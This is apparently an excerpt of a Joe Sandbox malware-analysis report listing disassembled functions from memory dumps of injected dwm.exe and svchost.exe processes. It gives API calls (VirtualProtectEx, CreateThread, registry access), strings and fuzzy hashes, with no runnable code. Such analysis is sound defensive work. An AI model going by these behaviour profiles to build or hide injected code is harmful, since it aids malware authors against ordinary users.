Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: c426ee955cf31c563f9250c19877442c6643ab040ed08f960a15f408a37eb9c0
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: C5F04FB234468692FB20CB61FC98B996770F754B88F848024CAD94B954EF6CC688CB04

Function 000001C6CEF13200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001C6CEF13222
StrCpyW.SHLWAPI ref: 000001C6CEF13232
StrCatW.SHLWAPI ref: 000001C6CEF1323E
PathCombineW.SHLWAPI ref: 000001C6CEF1324C

Strings

\\.\pipe\, xrefs: 000001C6CEF13218

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 241c31a1f4866e61d9c678f0abff56c433ba6db0355a2f1a7e56bc2e656afed4
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: E7F08CB0345BC192FB089B53BD09599A230EB98FD0F098131EEEA07B68CF6CC581C708

Function 000001C6CEF1A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001C6CEF1A154
GetProcAddress.KERNEL32 ref: 000001C6CEF1A16A
FreeLibrary.KERNEL32 ref: 000001C6CEF1A187

Strings

CorExitProcess, xrefs: 000001C6CEF1A163
mscoree.dll, xrefs: 000001C6CEF1A14B

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 5591f0027bd77789f36fcf12bcf00f00d25ac80df425829cb658f53af96e8c9c
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 18F082F2352AC591FF488BA0EC88BE42370AB98B80F44241995EB49565CF6CC48CCB18

Function 000001C6CEF20860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001C6CEF208A2
GetConsoleMode.KERNEL32 ref: 000001C6CEF20960
GetLastError.KERNEL32 ref: 000001C6CEF209EA

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: e2482cd66d2799a465b711d3976e0e811f94cc1c255aa086b5275cf2cbedd1e8
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: CD81F03369068489FB509B64CC58FED27B1F768B98F844216DEAA57BD1DB34C442C718

Function 000001C6CEF157F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C6CEF15806

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
Instruction ID: eceea85e3ad254ef0497db553e4deb6429b196cf56b25d7d834e2983e81ffb55
Opcode Fuzzy Hash: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
Instruction Fuzzy Hash: EE613772159B88C6F7618B45F884B9AB7B0F388754F501116EADE47BA8DB3CC540CF08

Function 000001C6CEF512B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001C6CEF512E0
_set_statfp.LIBCMT ref: 000001C6CEF512FB
_set_statfp.LIBCMT ref: 000001C6CEF51317
_set_statfp.LIBCMT ref: 000001C6CEF51353

Memory Dump Source

Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: f895fb87d25c71b595030c374189c8f1cbe5782c05fcdc6b4692dcfef1583321
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2C11E533BD6E0041F7A41169EC76BED31706B75374F49C624EAF646BDA8A58EC42C20C

Function 000001C6CEEF12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001C6CEEF12E0
_set_statfp.LIBCMT ref: 000001C6CEEF12FB
_set_statfp.LIBCMT ref: 000001C6CEEF1317
_set_statfp.LIBCMT ref: 000001C6CEEF1353

Memory Dump Source

Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 7faa0711d3ac7450846e3782af0c2022bbc5f75ce36ec11883c4af04835c9b71
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: D1115E33AD5E0903F6A41169FD56BE930616B6C3F4F4A4624AAF646BDB8E1CCC43C20D

Function 000001C6CEF21EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001C6CEF21EE0
_set_statfp.LIBCMT ref: 000001C6CEF21EFB
_set_statfp.LIBCMT ref: 000001C6CEF21F17
_set_statfp.LIBCMT ref: 000001C6CEF21F53

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 8bf9bd236d4a6a46a0f0424c35433f4419572b8b95b434b5953a53c2633b98c6
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: B011A533AD4AC102F7A81168EC9EBE914717B74374F184664BBF6167DA8B58CC42C20C

Function 000001C6CEF484F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C6CEF48503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C6CEF48598

Strings

f, xrefs: 000001C6CEF48516
csm, xrefs: 000001C6CEF4857E

Memory Dump Source

Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 43fceedfb628e739c75e500f3bdb6e569c041b6239f19088cd34081d5cabc3f6
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: D151D1327526848BFB94DF15EE44F9833B5F351B98F518126EAAA43788EB38CC41C708

Function 000001C6CEEE84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C6CEEE8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C6CEEE8598

Strings

csm, xrefs: 000001C6CEEE857E
f, xrefs: 000001C6CEEE8516

Memory Dump Source

Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: d2c290309888e94f91a6884948b93812683523ca216f000ead077fe505a1f454
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 8B517732652A018BFB14CF25FC44F9937B5F348BD8F5981249A9A47788EB39D842C78C

Function 000001C6CEF484D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C6CEF48503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C6CEF48598

Strings

f, xrefs: 000001C6CEF48516
csm, xrefs: 000001C6CEF4857E

Memory Dump Source

Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 1dce46af4b76d9e69d9164553566d8f592017b7f108f12a4e442ac34a881cfdb
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 30314772252A8496FB14DF12ED84B9937B4F750BA8F158119FEAA07789EB38C941C708

Function 000001C6CEEE84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C6CEEE8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C6CEEE8598

Strings

csm, xrefs: 000001C6CEEE857E
f, xrefs: 000001C6CEEE8516

Memory Dump Source

Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: e2923f8eae84390d0dd1e1d208e1cef3e2627c277d6901d2bf8bfdf3be79ed45
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: F4315472251E408BFB149B12EC44B9937B4F748BD8F198514AE9A07789DB3DC946C78C

Function 000001C6CEF114B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C6CEF114D5
HeapFree.KERNEL32 ref: 000001C6CEF114E4
GetProcessHeap.KERNEL32 ref: 000001C6CEF114F0
HeapFree.KERNEL32 ref: 000001C6CEF114FF
GetProcessHeap.KERNEL32 ref: 000001C6CEF1152A

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: 1e1562f8ff9f39f77c368a6b852dbf986277bb9c9cf334a67f1f3257bc7f58eb
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: 94115A72A55B99D2FB589FA6B84869A7370F799F80F044129EBEA03714DF78C051CB08

Function 000001C6CEF126F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001C6CEF127D4
StrCpyW.SHLWAPI ref: 000001C6CEF127ED

Strings

\\.\pipe\, xrefs: 000001C6CEF127DF

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 98e394d386d18e6abb614bb5efef06709649f6ea169faf2d3f4d1568f3e9b618
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 2271E3B22447C986F724DFEA9D44BEA67B1F744B84F840016DEE943B88EE35C604E708

Function 000001C6CEF124DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001C6CEF125C3
StrCpyW.SHLWAPI ref: 000001C6CEF125DA

Strings

\\.\pipe\, xrefs: 000001C6CEF125CE

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: bab85156676f63cbb9ee00bf86132f720759c184b547c09a91b4265b6fdeb8e7
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: C651E7722887C982F7349FE9A954BEE6671F3857C0F054025CEEA03BD9DA39C411DB48

Function 000001C6CEF20604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001C6CEF2071B
GetLastError.KERNEL32 ref: 000001C6CEF2073D

Strings

U, xrefs: 000001C6CEF206C7

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 799fd7ee2d9807c52d53fe97d3167f88f05785cf5af0206fb32045fc681e5906
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 8D41A273315A8482FB20DF25E848BEAA7B1F3A8784F804125EE9D87798DB3CC541CB54

Function 000001C6CEF1D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001C6CEF1D6F9
LCMapStringW.KERNEL32 ref: 000001C6CEF1D781

Strings

LCMapStringEx, xrefs: 000001C6CEF1D6DC, 000001C6CEF1D6ED

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 14d565a3c13f4acebdba713ec7b8115c98cc747bb9eaebccffc76ef6e1553a00
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: A0113876608BC086EB60CF56B84069AB7B0F7D8B90F944126EEDD83B19DF38C450CB04

Function 000001C6CEF194A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001C6CEF194E8
RaiseException.KERNEL32 ref: 000001C6CEF1952E

Strings

csm, xrefs: 000001C6CEF1951B

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: e080276c791022d28bd33b783591af3751118566b7729b0a99423cb01cbe41f4
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 9B113A72209B8482EB648B15E84079977E0F788B98F188220DEDD07B68DF3DC951CB44

Function 000001C6CEF1D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001C6CEF1D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000001C6CEF1D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000001C6CEF1D681

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: f5ce3698ae6417b497387e4f752cadfd3631085887bdeeaecc22de44b0bfc8d8
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 4FF082B27507C492FB099F85FC44AD56331AB98BD0F889025A9F903B54CF79C995C718

Function 000001C6CEF4CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001C6CEF4CBC5

Strings

November, xrefs: 000001C6CEF4CBA8, 000001C6CEF4CBB2
October, xrefs: 000001C6CEF4CBBE

Memory Dump Source

Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 5a746ebe6e445bb51debf2aad7fbf526faaa0f9e02807b0d5330a58ab9a25a7a
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: A7E09232281581A2FB069B51FD50AE432319BA4740F69E022D5FA06392CE38C886D358

Function 000001C6CEEECB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001C6CEEECBC5

Strings

October, xrefs: 000001C6CEEECBBE
November, xrefs: 000001C6CEEECBA8, 000001C6CEEECBB2

Memory Dump Source

Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: d8c0ad9571f6bc361fc9189bc75cecf0d9d8f05f692679aae737f575f1c4f239
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 86E09232280AC593FB049B51FC41AE562319B8C7D4F695021A599072A6DF3CC887C38C

Function 000001C6CEF1D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001C6CEF1D631
TlsSetValue.KERNEL32 ref: 000001C6CEF1D648

Strings

FlsSetValue, xrefs: 000001C6CEF1D61E

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: acdf6042fb1223443866c5409b429f13857d0b0ce4586bf4caf179bcd8a96ec1
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 26E06DF12816C592FF084B90FC08ED42232AB98B81F888122D9F906295CF78C855CB18

Function 000001C6CEF11D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C6CEF11D9B
HeapAlloc.KERNEL32 ref: 000001C6CEF11DAA
GetProcessHeap.KERNEL32 ref: 000001C6CEF11E1E
HeapFree.KERNEL32 ref: 000001C6CEF11E2C

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: ba62e4c6986bb2080b100d714a19940e8b946af5f39f5813ff9e1ec10b1dd90a
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 75218E73649B9482FB158FAAA80469AB3B0FB88B94F154114EEDC47B24EF78D542CB04

Function 000001C6CEF11274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C6CEF1127A
HeapAlloc.KERNEL32 ref: 000001C6CEF11289
GetProcessHeap.KERNEL32 ref: 000001C6CEF112A3
HeapAlloc.KERNEL32 ref: 000001C6CEF112B4

Memory Dump Source

Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: a05600514fbb28098809f6d24e39dd1a35c03d067d74a3125c8b4a32759ea9c2
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 5DE065B1A52A41C6F7088FA2DC0878A36F1FB98F01F48C024C99907360DFBDC49ADB80

Analysis Process: svchost.exePID: 352, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 0000025304FB3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000025304FB347A
PathFindFileNameW.SHLWAPI ref: 0000025304FB3489

Part of subcall function 0000025304FB3930: StrCmpNIW.SHLWAPI ref: 0000025304FB3948

Part of subcall function 0000025304FB3878: GetModuleHandleW.KERNEL32 ref: 0000025304FB3886
Part of subcall function 0000025304FB3878: GetCurrentProcess.KERNEL32 ref: 0000025304FB38B4
Part of subcall function 0000025304FB3878: VirtualProtectEx.KERNEL32 ref: 0000025304FB38D6
Part of subcall function 0000025304FB3878: GetCurrentProcess.KERNEL32 ref: 0000025304FB38F4
Part of subcall function 0000025304FB3878: VirtualProtectEx.KERNEL32 ref: 0000025304FB3915

CreateThread.KERNEL32 ref: 0000025304FB34D7

Part of subcall function 0000025304FB1EB4: GetCurrentThread.KERNEL32 ref: 0000025304FB1EBF

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: f347dbf05d3a5696189500049bf4bfb8c0071b2b7d16366bc627253bba18f1bd
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: DE118B71654F1182FB25D760BE4E39A2290A7463E7F44A0249E0A851D4EF39C34482BC

Function 0000025304FB1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000025304FB1650: GetProcessHeap.KERNEL32 ref: 0000025304FB165B
Part of subcall function 0000025304FB1650: HeapAlloc.KERNEL32 ref: 0000025304FB166A
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB16DA
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1707
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1721
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1741
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB175C
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB177C
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1797
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB17B7
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB17D2
